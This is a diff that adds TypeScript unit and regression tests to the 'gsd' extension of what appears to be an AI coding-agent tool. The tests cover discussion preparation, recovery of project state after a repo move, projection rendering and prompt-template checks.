+    discuss_web_research: false, // Skip web research to avoid API key requirement
+    discuss_depth: "standard",
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  // Check result structure
+  assert.equal(result.enabled, true, "should be enabled");
+  assert.ok(result.codebase, "should have codebase");
+  assert.ok(result.priorContext, "should have priorContext");
+  assert.ok(result.ecosystem, "should have ecosystem");
+  assert.ok(typeof result.codebaseBrief === "string", "should have codebaseBrief");
+  assert.ok(typeof result.priorContextBrief === "string", "should have priorContextBrief");
+  assert.ok(typeof result.ecosystemBrief === "string", "should have ecosystemBrief");
+  assert.ok(result.durationMs > 0, "should have positive duration");
+  assert.equal(result.ecosystemResearchPerformed, false, "should not have performed ecosystem research");
+
+  // Check TUI progress notifications
+  assert.ok(ui.notifications.length > 0, "should have notifications");
+  assert.ok(
+    ui.notifications.some((n) => n.message.includes("Analyzing codebase")),
+    "should show codebase analysis start",
+  );
+  assert.ok(
+    ui.notifications.some((n) => n.message.includes("✓ Analyzed codebase")),
+    "should show codebase analysis complete",
+  );
+  assert.ok(
+    ui.notifications.some((n) => n.message.includes("Reviewing prior context")),
+    "should show prior context start",
+  );
+  assert.ok(
+    ui.notifications.some((n) => n.message.includes("✓ Reviewed prior context")),
+    "should show prior context complete",
+  );
+});
+
+test("runPreparation: returns early when discuss_preparation is false", async (t) => {
+  const dir = makeTempDir("runprep-disabled");
+  t.after(() => cleanup(dir));
+
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: false,
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  assert.equal(result.enabled, false, "should indicate preparation disabled");
+  assert.equal(result.codebaseBrief, "", "should have empty codebase brief");
+  assert.equal(result.priorContextBrief, "", "should have empty prior context brief");
+  assert.equal(result.ecosystemBrief, "", "should have empty ecosystem brief");
+  assert.equal(ui.notifications.length, 0, "should not show any notifications");
+  assert.ok(result.durationMs >= 0, "should have non-negative duration");
+});
+
+test("runPreparation: ecosystem research always returns unavailable (happens during discussion)", async (t) => {
+  const dir = makeTempDir("runprep-no-ecosystem");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, "package.json"), '{"name": "test"}', "utf-8");
+
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: true, // Even with this enabled, ecosystem research returns unavailable
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  assert.equal(result.enabled, true);
+  assert.equal(result.ecosystemResearchPerformed, false, "should not perform ecosystem research from preparation");
+  assert.equal(result.ecosystem.available, false);
+  assert.ok(
+    result.ecosystem.skippedReason?.includes("during the discussion"),
+    "should indicate research happens during discussion",
+  );
+
+  // Should NOT have ecosystem research notifications (no longer part of preparation)
+  assert.ok(
+    !ui.notifications.some((n) => n.message.includes("Researching ecosystem")),
+    "should not show ecosystem research notification",
+  );
+});
+
+test("runPreparation: works without UI context (silent mode)", async (t) => {
+  const dir = makeTempDir("runprep-silent");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, "package.json"), '{"name": "test"}', "utf-8");
+
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  // Pass null for UI to test silent mode
+  const result = await runPreparation(dir, null, prefs);
+
+  assert.equal(result.enabled, true, "should work without UI");
+  assert.ok(result.codebase, "should have codebase");
+  assert.ok(result.priorContext, "should have priorContext");
+  assert.ok(result.durationMs > 0, "should have duration");
+});
+
+test("runPreparation: completes within 60s requirement (R112)", async (t) => {
+  const dir = makeTempDir("runprep-timing");
+  t.after(() => cleanup(dir));
+
+  // Create a project with some content to analyze
+  mkdirSync(join(dir, "src"), { recursive: true });
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, "package.json"), '{"name": "test"}', "utf-8");
+  writeFileSync(join(dir, "tsconfig.json"), '{}', "utf-8");
+
+  for (let i = 0; i < 10; i++) {
+    writeFileSync(
+      join(dir, "src", `file${i}.ts`),
+      `export async function fn${i}() { await Promise.resolve(); }\n`.repeat(50),
+      "utf-8",
+    );
+  }
+
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+    discuss_depth: "standard",
+  };
+
+  const startTime = performance.now();
+  const result = await runPreparation(dir, null, prefs);
+  const elapsed = performance.now() - startTime;
+
+  assert.ok(result.durationMs < 60000, `should complete within 60s, took ${result.durationMs}ms`);
+  assert.ok(elapsed < 60000, `elapsed time should be under 60s, was ${elapsed}ms`);
+});
+
+test("runPreparation: does not throw on any input", async (t) => {
+  const dir = makeTempDir("runprep-robust");
+  t.after(() => cleanup(dir));
+
+  // Test with completely empty directory
+  const prefs: PreparationPreferences = {};
+
+  let result: PreparationResult | undefined;
+  let error: unknown;
+
+  try {
+    result = await runPreparation(dir, null, prefs);
+  } catch (e) {
+    error = e;
+  }
+
+  assert.equal(error, undefined, "should not throw");
+  assert.ok(result, "should return result");
+  assert.equal(result!.enabled, true, "should be enabled by default");
+});
+
+test("runPreparation: detects framework from config files in codebase brief", async (t) => {
+  const dir = makeTempDir("runprep-framework");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, "package.json"), '{"name": "test"}', "utf-8");
+  writeFileSync(join(dir, "next.config.mjs"), 'export default {};', "utf-8");
+
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+  };
+
+  const result = await runPreparation(dir, null, prefs);
+
+  // Should detect Next.js config file in codebase analysis
+  assert.ok(
+    result.codebase.techStack.detectedFiles.includes("next.config.mjs"),
+    "should detect next.config.mjs in codebase brief",
+  );
+  // Ecosystem queries are always empty from preparation (research happens during discussion)
+  assert.deepEqual(result.ecosystem.queries, [], "ecosystem queries should be empty from preparation");
+});
+
+test("runPreparation: default preferences enable preparation and web research", async (t) => {
+  const dir = makeTempDir("runprep-defaults");
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {}; // All defaults
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  // With defaults, preparation should be enabled
+  assert.equal(result.enabled, true, "should be enabled by default");
+  // Notifications should be shown
+  assert.ok(ui.notifications.length > 0, "should show notifications");
+});
diff --git a/src/resources/extensions/gsd/tests/project-relocation-recovery.test.ts b/src/resources/extensions/gsd/tests/project-relocation-recovery.test.ts
new file mode 100644
index 000000000..22b451c4a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/project-relocation-recovery.test.ts
@@ -0,0 +1,297 @@
+/**
+ * Project Relocation Recovery Tests (#2750)
+ *
+ * Verifies that moving/renaming a GSD project directory does not cause
+ * silent data loss. When a repo has a remote URL, the identity hash
+ * should be based solely on the remote — making moves transparent.
+ *
+ * For local-only repos (no remote), ensureGsdSymlink should detect
+ * orphaned state directories with a matching .gsd-id marker and
+ * recover them automatically.
+ */
+
+import { describe, test, before, after } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  rmSync,
+  writeFileSync,
+  readFileSync,
+  existsSync,
+  realpathSync,
+  mkdirSync,
+  readdirSync,
+  renameSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execFileSync } from "node:child_process";
+
+import {
+  repoIdentity,
+  externalGsdRoot,
+  ensureGsdSymlink,
+  readRepoMeta,
+  externalProjectsRoot,
+} from "../repo-identity.ts";
+
+function git(args: string[], cwd: string): string {
+  return execFileSync("git", args, {
+    cwd,
+    stdio: ["ignore", "pipe", "pipe"],
+    encoding: "utf-8",
+  }).trim();
+}
+
+function normalizePath(p: string): string {
+  const resolved =
+    process.platform === "win32" ? realpathSync.native(p) : realpathSync(p);
+  return process.platform === "win32" ? resolved.toLowerCase() : resolved;
+}
+
+function initRepo(dir: string, remote?: string): void {
+  git(["init", "-b", "main"], dir);
+  git(["config", "user.name", "Test"], dir);
+  git(["config", "user.email", "test@example.com"], dir);
+  if (remote) {
+    git(["remote", "add", "origin", remote], dir);
+  }
+  writeFileSync(join(dir, "README.md"), "# Test\n", "utf-8");
+  git(["add", "README.md"], dir);
+  git(["commit", "-m", "init"], dir);
+}
+
+describe("project-relocation-recovery (#2750)", () => {
+  let stateDir: string;
+  let savedStateDir: string | undefined;
+
+  before(() => {
+    savedStateDir = process.env.GSD_STATE_DIR;
+    stateDir = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-state-")));
+    process.env.GSD_STATE_DIR = stateDir;
+  });
+
+  after(() => {
+    if (savedStateDir !== undefined) {
+      process.env.GSD_STATE_DIR = savedStateDir;
+    } else {
+      delete process.env.GSD_STATE_DIR;
+    }
+    rmSync(stateDir, { recursive: true, force: true });
+  });
+
+  // ── Remote repos: identity should be path-independent ─────────────────
+
+  test("repoIdentity is stable across moves for repos with a remote URL", () => {
+    const repoA = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-a-")));
+    initRepo(repoA, "https://github.com/example/myrepo.git");
+
+    const identityBefore = repoIdentity(repoA);
+
+    // Move the repo to a new location
+    const repoB = join(
+      tmpdir(),
+      `gsd-reloc-b-${Date.now()}-${Math.random().toString(36).slice(2)}`,
+    );
+    renameSync(repoA, repoB);
+
+    const identityAfter = repoIdentity(repoB);
+
+    assert.strictEqual(
+      identityAfter,
+      identityBefore,
+      "identity hash must be stable when a remote-enabled repo is moved",
+    );
+
+    rmSync(repoB, { recursive: true, force: true });
+  });
+
+  test("ensureGsdSymlink reuses the same external dir after repo move (remote repo)", () => {
+    const repoA = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-reuse-a-")));
+    initRepo(repoA, "https://github.com/example/reloc-reuse.git");
+
+    // Initialize GSD state with some planning data
+    const externalA = ensureGsdSymlink(repoA);
+    const milestonesPath = join(externalA, "milestones");
+    mkdirSync(milestonesPath, { recursive: true });
+    writeFileSync(
+      join(milestonesPath, "M001.md"),
+      "# Milestone 1\nImportant planning data\n",
+      "utf-8",
+    );
+
+    // Move the repo
+    const repoB = join(
+      tmpdir(),
+      `gsd-reloc-reuse-b-${Date.now()}-${Math.random().toString(36).slice(2)}`,
+    );
+    renameSync(repoA, repoB);
+
+    // ensureGsdSymlink at the new location should find the same external dir
+    const externalB = ensureGsdSymlink(repoB);
+
+    assert.strictEqual(
+      normalizePath(externalB),
+      normalizePath(externalA),
+      "external state dir must be the same after move",
+    );
+
+    // Planning data must survive the move
+    assert.ok(
+      existsSync(join(externalB, "milestones", "M001.md")),
+      "milestone data must survive project relocation",
+    );
+
+    const content = readFileSync(
+      join(externalB, "milestones", "M001.md"),
+      "utf-8",
+    );
+    assert.ok(
+      content.includes("Important planning data"),
+      "milestone content must be preserved",
+    );
+
+    rmSync(repoB, { recursive: true, force: true });
+  });
+
+  test("repo-meta.json gitRoot is updated after move (remote repo)", () => {
+    const repoA = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-meta-a-")));
+    initRepo(repoA, "https://github.com/example/reloc-meta.git");
+
+    const externalA = ensureGsdSymlink(repoA);
+    const metaBefore = readRepoMeta(externalA);
+    assert.ok(metaBefore !== null, "metadata should exist before move");
+
+    // Move the repo
+    const repoB = join(
+      tmpdir(),
+      `gsd-reloc-meta-b-${Date.now()}-${Math.random().toString(36).slice(2)}`,
+    );
+    renameSync(repoA, repoB);
+
+    const externalB = ensureGsdSymlink(repoB);
+    const metaAfter = readRepoMeta(externalB);
+    assert.ok(metaAfter !== null, "metadata should exist after move");
+    assert.strictEqual(
+      normalizePath(metaAfter!.gitRoot),
+      normalizePath(repoB),
+      "repo-meta.json gitRoot must be updated to new location",
+    );
+    assert.strictEqual(
+      metaAfter!.createdAt,
+      metaBefore!.createdAt,
+      "createdAt must be preserved across moves",
+    );
+
+    rmSync(repoB, { recursive: true, force: true });
+  });
+
+  // ── Local-only repos: .gsd-id marker provides recovery ────────────────
+
+  test("ensureGsdSymlink writes a .gsd-id marker in the project root", () => {
+    const repo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-marker-")));
+    initRepo(repo);
+
+    ensureGsdSymlink(repo);
+
+    const markerPath = join(repo, ".gsd-id");
+    assert.ok(existsSync(markerPath), ".gsd-id marker must be written by ensureGsdSymlink");
+
+    const markerId = readFileSync(markerPath, "utf-8").trim();
+    const computedId = repoIdentity(repo);
+    assert.strictEqual(markerId, computedId, ".gsd-id must contain the repo identity hash");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+
+  test("local-only repo recovers state via .gsd-id marker after move", () => {
+    const repoA = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-local-a-")));
+    initRepo(repoA);
+    // No remote — identity includes gitRoot
+
+    // Initialize GSD state
+    const externalA = ensureGsdSymlink(repoA);
+    mkdirSync(join(externalA, "milestones"), { recursive: true });
+    writeFileSync(
+      join(externalA, "milestones", "M001.md"),
+      "# Local Milestone\n",
+      "utf-8",
+    );
+
+    const identityBefore = repoIdentity(repoA);
+
+    // Move the repo
+    const repoB = join(
+      tmpdir(),
+      `gsd-reloc-local-b-${Date.now()}-${Math.random().toString(36).slice(2)}`,
+    );
+    renameSync(repoA, repoB);
+
+    // The identity WILL change (no remote, gitRoot changed)
+    const identityAfter = repoIdentity(repoB);
+    assert.notStrictEqual(
+      identityAfter,
+      identityBefore,
+      "local-only repo identity changes with move (expected)",
+    );
+
+    // But ensureGsdSymlink should detect .gsd-id marker and recover
+    const externalB = ensureGsdSymlink(repoB);
+    assert.ok(
+      existsSync(join(externalB, "milestones", "M001.md")),
+      "local-only repo must recover state via .gsd-id marker after move",
+    );
+
+    rmSync(repoB, { recursive: true, force: true });
+  });
+
+  // ── Edge cases ────────────────────────────────────────────────────────
+
+  test("identity remains different for repos with different remotes", () => {
+    const repoA = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-diff-a-")));
+    initRepo(repoA, "https://github.com/example/repo-alpha.git");
+
+    const repoB = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-diff-b-")));
+    initRepo(repoB, "https://github.com/example/repo-beta.git");
+
+    assert.notStrictEqual(
+      repoIdentity(repoA),
+      repoIdentity(repoB),
+      "repos with different remotes must have different identities",
+    );
+
+    rmSync(repoA, { recursive: true, force: true });
+    rmSync(repoB, { recursive: true, force: true });
+  });
+
+  test("no orphaned state dir created when remote repo is moved", () => {
+    const repoA = realpathSync(mkdtempSync(join(tmpdir(), "gsd-reloc-orphan-a-")));
+    initRepo(repoA, "https://github.com/example/no-orphan.git");
+
+    ensureGsdSymlink(repoA);
+
+    // Count project dirs before move
+    const projectsDir = externalProjectsRoot();
+    const countBefore = existsSync(projectsDir)
+      ? readdirSync(projectsDir).length
+      : 0;
+
+    // Move the repo
+    const repoB = join(
+      tmpdir(),
+      `gsd-reloc-orphan-b-${Date.now()}-${Math.random().toString(36).slice(2)}`,
+    );
+    renameSync(repoA, repoB);
+
+    ensureGsdSymlink(repoB);
+
+    const countAfter = readdirSync(projectsDir).length;
+    assert.strictEqual(
+      countAfter,
+      countBefore,
+      "moving a remote repo must not create a new orphaned state directory",
+    );
+
+    rmSync(repoB, { recursive: true, force: true });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/project-root-cwd-crash.test.ts b/src/resources/extensions/gsd/tests/project-root-cwd-crash.test.ts
new file mode 100644
index 000000000..a75d3f13f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/project-root-cwd-crash.test.ts
@@ -0,0 +1,53 @@
+/**
+ * Regression test for #3598 — projectRoot ENOENT crash on deleted cwd
+ *
+ * When the working directory is deleted (e.g. worktree teardown), process.cwd()
+ * throws ENOENT. The fix wraps process.cwd() in a try/catch and falls back to
+ * process.env.HOME.
+ *
+ * Also verifies #3589 — nativeBranchExists validation for prefs.main_branch
+ * in auto-worktree.ts to prevent merge failures with stale preferences.
+ *
+ * Structural verification test — reads source to confirm the guards exist.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const contextSource = readFileSync(join(__dirname, '..', 'commands', 'context.ts'), 'utf-8');
+const worktreeSource = readFileSync(join(__dirname, '..', 'auto-worktree.ts'), 'utf-8');
+
+describe('projectRoot cwd crash guard (#3598)', () => {
+  test('projectRoot wraps process.cwd() in try/catch', () => {
+    assert.match(contextSource, /try\s*\{[\s\S]*?process\.cwd\(\)/,
+      'process.cwd() should be inside a try block');
+  });
+
+  test('catch block falls back to process.env.HOME', () => {
+    assert.match(contextSource, /catch[\s\S]*?process\.env\.HOME/,
+      'catch block should fall back to process.env.HOME');
+  });
+
+  test('projectRoot function is exported', () => {
+    assert.match(contextSource, /export function projectRoot\(\)/,
+      'projectRoot should be an exported function');
+  });
+});
+
+describe('main_branch nativeBranchExists validation (#3589)', () => {
+  test('prefs.main_branch is validated with nativeBranchExists', () => {
+    assert.match(worktreeSource, /nativeBranchExists\(.*prefs\.main_branch\)/,
+      'nativeBranchExists should validate prefs.main_branch');
+  });
+
+  test('validatedPrefBranch falls back to undefined when branch missing', () => {
+    assert.match(worktreeSource, /validatedPrefBranch[\s\S]*?:\s*undefined/,
+      'validatedPrefBranch should fall back to undefined');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/projection-no-plan-overwrite.test.ts b/src/resources/extensions/gsd/tests/projection-no-plan-overwrite.test.ts
new file mode 100644
index 000000000..e87c3a4ca
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/projection-no-plan-overwrite.test.ts
@@ -0,0 +1,83 @@
+/**
+ * Regression test for #3651 — renderAllProjections must NOT call renderPlanProjection
+ *
+ * renderAllProjections previously called renderPlanProjection inside the slice
+ * loop, which overwrote the authoritative PLAN.md (produced by markdown-renderer.js
+ * in plan-slice/replan-slice tools) with a simplified projection that was missing
+ * key sections (Must-Haves, Verification, Files Likely Touched) and corrupted
+ * multi-line task descriptions.
+ *
+ * The fix removes the renderPlanProjection call from the renderAllProjections
+ * loop. The renderIfMissing recovery path is preserved.
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+// Use process.cwd() based resolution instead of import.meta.url
+// to avoid tsx test runner path resolution issues
+const src = readFileSync(
+  resolve(process.cwd(), 'src', 'resources', 'extensions', 'gsd', 'workflow-projections.ts'),
+  'utf-8',
+)
+
+describe('renderAllProjections must not overwrite PLAN.md (#3651)', () => {
+  it('renderAllProjections function body does NOT invoke renderPlanProjection', () => {
+    // Extract the renderAllProjections function body
+    const fnStart = src.indexOf('export async function renderAllProjections(')
+    assert.ok(fnStart !== -1, 'renderAllProjections function must exist')
+
+    // Find the for-loop over sliceRows inside renderAllProjections
+    const loopStart = src.indexOf('for (const slice of sliceRows)', fnStart)
+    assert.ok(loopStart !== -1, 'slice loop must exist in renderAllProjections')
+
+    // Find the closing of renderAllProjections (next section marker)
+    const fnEnd = src.indexOf('\n// ─── ', fnStart + 1)
+    assert.ok(fnEnd !== -1, 'section delimiter after renderAllProjections must exist')
+
+    const fnBody = src.slice(loopStart, fnEnd)
+
+    // The fix: renderPlanProjection must NOT appear as a function call.
+    // Strip comment lines before checking (comments may mention the function name).
+    const codeOnly = fnBody
+      .split('\n')
+      .filter(line => !line.trim().startsWith('//'))
+      .join('\n')
+
+    const hasPlanCall = /renderPlanProjection\s*\(/.test(codeOnly)
+    assert.equal(
+      hasPlanCall,
+      false,
+      'renderPlanProjection must not be called inside the renderAllProjections slice loop — ' +
+        'authoritative PLAN.md is rendered only by plan-slice/replan-slice tools',
+    )
+  })
+
+  it('renderPlanProjection is still defined (available for regenerateIfMissing)', () => {
+    assert.ok(
+      src.includes('function renderPlanProjection('),
+      'renderPlanProjection function definition must still exist for on-demand recovery',
+    )
+  })
+
+  it('renderAllProjections still renders ROADMAP, SUMMARY, and STATE projections', () => {
+    const fnStart = src.indexOf('export async function renderAllProjections(')
+    const fnEnd = src.indexOf('\n// ─── ', fnStart + 1)
+    const fnBody = src.slice(fnStart, fnEnd)
+
+    assert.ok(
+      fnBody.includes('renderRoadmapProjection('),
+      'renderRoadmapProjection must still be called',
+    )
+    assert.ok(
+      fnBody.includes('renderSummaryProjection('),
+      'renderSummaryProjection must still be called',
+    )
+    assert.ok(
+      fnBody.includes('renderStateProjection('),
+      'renderStateProjection must still be called',
+    )
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/projection-regression.test.ts b/src/resources/extensions/gsd/tests/projection-regression.test.ts
new file mode 100644
index 000000000..90a06e7b9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/projection-regression.test.ts
@@ -0,0 +1,174 @@
+// GSD — projection renderer regression tests
+// Verifies that "done" vs "complete" status mismatch doesn't recur.
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+
+import { renderPlanContent, renderRoadmapContent } from '../workflow-projections.ts';
+import type { SliceRow, TaskRow } from '../gsd-db.ts';
+
+// ─── Helpers ─────────────────────────────────────────────────────────────
+
+function makeSliceRow(overrides?: Partial<SliceRow>): SliceRow {
+  return {
+    milestone_id: 'M001',
+    id: 'S01',
+    title: 'Test Slice',
+    status: 'pending',
+    risk: 'medium',
+    depends: [],
+    demo: 'Demo.',
+    created_at: '2026-01-01T00:00:00Z',
+    completed_at: null,
+    full_summary_md: '',
+    full_uat_md: '',
+    goal: 'Test goal',
+    success_criteria: '',
+    proof_level: '',
+    integration_closure: '',
+    observability_impact: '',
+    sequence: 0,
+    replan_triggered_at: null,
+    ...overrides,
+  };
+}
+
+function makeTaskRow(overrides?: Partial<TaskRow>): TaskRow {
+  return {
+    milestone_id: 'M001',
+    slice_id: 'S01',
+    id: 'T01',
+    title: 'Test Task',
+    status: 'pending',
+    one_liner: '',
+    narrative: '',
+    verification_result: '',
+    duration: '',
+    completed_at: null,
+    blocker_discovered: false,
+    deviations: '',
+    known_issues: '',
+    key_files: [],
+    key_decisions: [],
+    full_summary_md: '',
+    full_plan_md: '',
+    description: 'Test description',
+    estimate: '30m',
+    files: ['src/test.ts'],
+    verify: 'npm test',
+    inputs: [],
+    expected_output: [],
+    observability_impact: '',
+    sequence: 0,
+    ...overrides,
+  };
+}
+
+function makeMilestoneRow() {
+  return {
+    id: 'M001',
+    title: 'Test Milestone',
+    status: 'active',
+    depends_on: [],
+    created_at: '2026-01-01T00:00:00Z',
+    completed_at: null,
+    vision: 'Test vision',
+    success_criteria: [],
+    key_risks: [],
+    proof_strategy: [],
+    verification_contract: '',
+    verification_integration: '',
+    verification_operational: '',
+    verification_uat: '',
+    definition_of_done: [],
+    requirement_coverage: '',
+    boundary_map_markdown: '',
+  };
+}
+
+// ─── renderPlanContent: checkbox regression ──────────────────────────────
+
+test('renderPlanContent: task with status "complete" renders [x] checkbox', () => {
+  const slice = makeSliceRow();
+  const tasks = [makeTaskRow({ id: 'T01', status: 'complete', title: 'Completed Task' })];
+
+  const content = renderPlanContent(slice, tasks);
+
+  assert.match(content, /\[x\]\s+\*\*T01:/, 'complete task should have [x] checkbox');
+});
+
+test('renderPlanContent: task with status "done" renders [x] checkbox', () => {
+  const slice = makeSliceRow();
+  const tasks = [makeTaskRow({ id: 'T01', status: 'done', title: 'Done Task' })];
+
+  const content = renderPlanContent(slice, tasks);
+
+  assert.match(content, /\[x\]\s+\*\*T01:/, 'done task should have [x] checkbox');
+});
+
+test('renderPlanContent: task with status "pending" renders [ ] checkbox', () => {
+  const slice = makeSliceRow();
+  const tasks = [makeTaskRow({ id: 'T01', status: 'pending', title: 'Pending Task' })];
+
+  const content = renderPlanContent(slice, tasks);
+
+  assert.match(content, /\[ \]\s+\*\*T01:/, 'pending task should have [ ] checkbox');
+});
+
+test('renderPlanContent: mixed statuses render correct checkboxes', () => {
+  const slice = makeSliceRow();
+  const tasks = [
+    makeTaskRow({ id: 'T01', status: 'complete', title: 'Done One' }),
+    makeTaskRow({ id: 'T02', status: 'pending', title: 'Pending One' }),
+    makeTaskRow({ id: 'T03', status: 'done', title: 'Done Two' }),
+  ];
+
+  const content = renderPlanContent(slice, tasks);
+
+  assert.match(content, /\[x\]\s+\*\*T01:/, 'T01 (complete) should be checked');
+  assert.match(content, /\[ \]\s+\*\*T02:/, 'T02 (pending) should be unchecked');
+  assert.match(content, /\[x\]\s+\*\*T03:/, 'T03 (done) should be checked');
+});
+
+// ─── renderPlanContent: format regression (parsePlan compatibility) ──────
+
+test('renderPlanContent: format matches parsePlan regex **ID: title**', () => {
+  const slice = makeSliceRow();
+  const tasks = [makeTaskRow({ id: 'T01', status: 'pending', title: 'My Task' })];
+
+  const content = renderPlanContent(slice, tasks);
+
+  // parsePlan expects: **T01: My Task** (both ID and title inside bold)
+  // NOT: **T01:** My Task (only ID in bold)
+  assert.match(content, /\*\*T01: My Task\*\*/, 'ID and title should both be inside bold markers');
+});
+
+// ─── renderRoadmapContent: status regression ─────────────────────────────
+
+test('renderRoadmapContent: slice with status "complete" shows ✅', () => {
+  const milestone = makeMilestoneRow();
+  const slices = [makeSliceRow({ id: 'S01', status: 'complete' })];
+
+  const content = renderRoadmapContent(milestone, slices);
+
+  assert.ok(content.includes('✅'), 'complete slice should show ✅');
+});
+
+test('renderRoadmapContent: slice with status "done" shows ✅', () => {
+  const milestone = makeMilestoneRow();
+  const slices = [makeSliceRow({ id: 'S01', status: 'done' })];
+
+  const content = renderRoadmapContent(milestone, slices);
+
+  assert.ok(content.includes('✅'), 'done slice should show ✅');
+});
+
+test('renderRoadmapContent: slice with status "pending" shows ⬜', () => {
+  const milestone = makeMilestoneRow();
+  const slices = [makeSliceRow({ id: 'S01', status: 'pending' })];
+
+  const content = renderRoadmapContent(milestone, slices);
+
+  assert.ok(content.includes('⬜'), 'pending slice should show ⬜');
+});
diff --git a/src/resources/extensions/gsd/tests/prompt-builder.test.ts b/src/resources/extensions/gsd/tests/prompt-builder.test.ts
new file mode 100644
index 000000000..811357307
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/prompt-builder.test.ts
@@ -0,0 +1,669 @@
+/**
+ * Prompt Builder Tests — Comprehensive tests for S02 components.
+ *
+ * Tests cover:
+ * 1. Template validation (context-enhanced.md, discuss-prepared.md)
+ * 2. Prompt loading and variable substitution
+ * 3. Enhanced context validation (R109)
+ * 4. Integration tests for format functions and prompt injection
+ */
+
+import test, { describe } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync, existsSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── Template Paths ─────────────────────────────────────────────────────────────
+
+const templatesDir = join(process.cwd(), "src/resources/extensions/gsd/templates");
+const promptsDir = join(process.cwd(), "src/resources/extensions/gsd/prompts");
+
+const contextEnhancedPath = join(templatesDir, "context-enhanced.md");
+const contextPath = join(templatesDir, "context.md");
+const discussPreparedPath = join(promptsDir, "discuss-prepared.md");
+
+// ─── Template Tests ─────────────────────────────────────────────────────────────
+
+describe("Template: context-enhanced.md", () => {
+  test("file exists", () => {
+    assert.ok(existsSync(contextEnhancedPath), "context-enhanced.md should exist");
+  });
+
+  test("contains all original context.md sections", () => {
+    const contextEnhanced = readFileSync(contextEnhancedPath, "utf-8");
+    const originalContext = readFileSync(contextPath, "utf-8");
+
+    // Extract section headers from original context.md
+    const originalSections = originalContext.match(/^## .+$/gm) ?? [];
+
+    // Each original section should be present in context-enhanced.md
+    for (const section of originalSections) {
+      assert.ok(
+        contextEnhanced.includes(section),
+        `context-enhanced.md should contain original section: ${section}`,
+      );
+    }
+  });
+
+  test("contains new structured sections for prepared discussions", () => {
+    const contextEnhanced = readFileSync(contextEnhancedPath, "utf-8");
+
+    // New sections required by R108
+    const newSections = [
+      "## Codebase Brief",
+      "## Architectural Decisions",
+      "## Interface Contracts",
+      "## Error Handling Strategy",
+      "## Testing Requirements",
+      "## Acceptance Criteria",
+      "## Ecosystem Notes",
+    ];
+
+    for (const section of newSections) {
+      assert.ok(
+        contextEnhanced.includes(section),
+        `context-enhanced.md should contain new section: ${section}`,
+      );
+    }
+  });
+
+  test("Codebase Brief has sub-sections", () => {
+    const contextEnhanced = readFileSync(contextEnhancedPath, "utf-8");
+
+    assert.ok(
+      contextEnhanced.includes("### Technology Stack"),
+      "Codebase Brief should have Technology Stack sub-section",
+    );
+    assert.ok(
+      contextEnhanced.includes("### Key Modules"),
+      "Codebase Brief should have Key Modules sub-section",
+    );
+    assert.ok(
+      contextEnhanced.includes("### Patterns in Use"),
+      "Codebase Brief should have Patterns in Use sub-section",
+    );
+  });
+
+  test("Architectural Decisions has structured format guidance", () => {
+    const contextEnhanced = readFileSync(contextEnhancedPath, "utf-8");
+
+    // Check for decision structure markers
+    assert.ok(
+      contextEnhanced.includes("**Decision:**"),
+      "Architectural Decisions should have Decision marker",
+    );
+    assert.ok(
+      contextEnhanced.includes("**Rationale:**"),
+      "Architectural Decisions should have Rationale marker",
+    );
+    assert.ok(
+      contextEnhanced.includes("**Evidence:**"),
+      "Architectural Decisions should have Evidence marker",
+    );
+    assert.ok(
+      contextEnhanced.includes("**Alternatives Considered:**"),
+      "Architectural Decisions should have Alternatives Considered marker",
+    );
+  });
+});
+
+describe("Template: discuss-prepared.md", () => {
+  test("file exists", () => {
+    assert.ok(existsSync(discussPreparedPath), "discuss-prepared.md should exist");
+  });
+
+  test("contains all three brief placeholders", () => {
+    const discussPrepared = readFileSync(discussPreparedPath, "utf-8");
+
+    assert.ok(
+      discussPrepared.includes("{{codebaseBrief}}"),
+      "discuss-prepared.md should contain {{codebaseBrief}} placeholder",
